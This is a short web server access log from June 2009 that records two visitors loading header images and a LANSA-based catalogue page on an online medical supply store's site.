60.51.124.240 - - [15/Jun/2009:01:11:38 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):01" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
60.51.124.240 - - [15/Jun/2009:01:11:39 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):01" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
59.16.152.82 - - [15/Jun/2009:01:11:38 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37 HTTP/1.1" 200 76245 "http://acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 1.1.4322; InfoPath.2)"
60.51.124.240 - - [15/Jun/2009:01:11:41 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):01" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
59.16.152.82 - - [15/Jun/2009:01:11:41 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 1.1.4322; InfoPath.2)"
59.16.152.82 - - [15/Jun/2009:01:11:41 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 1.1.4322; InfoPath.2)"
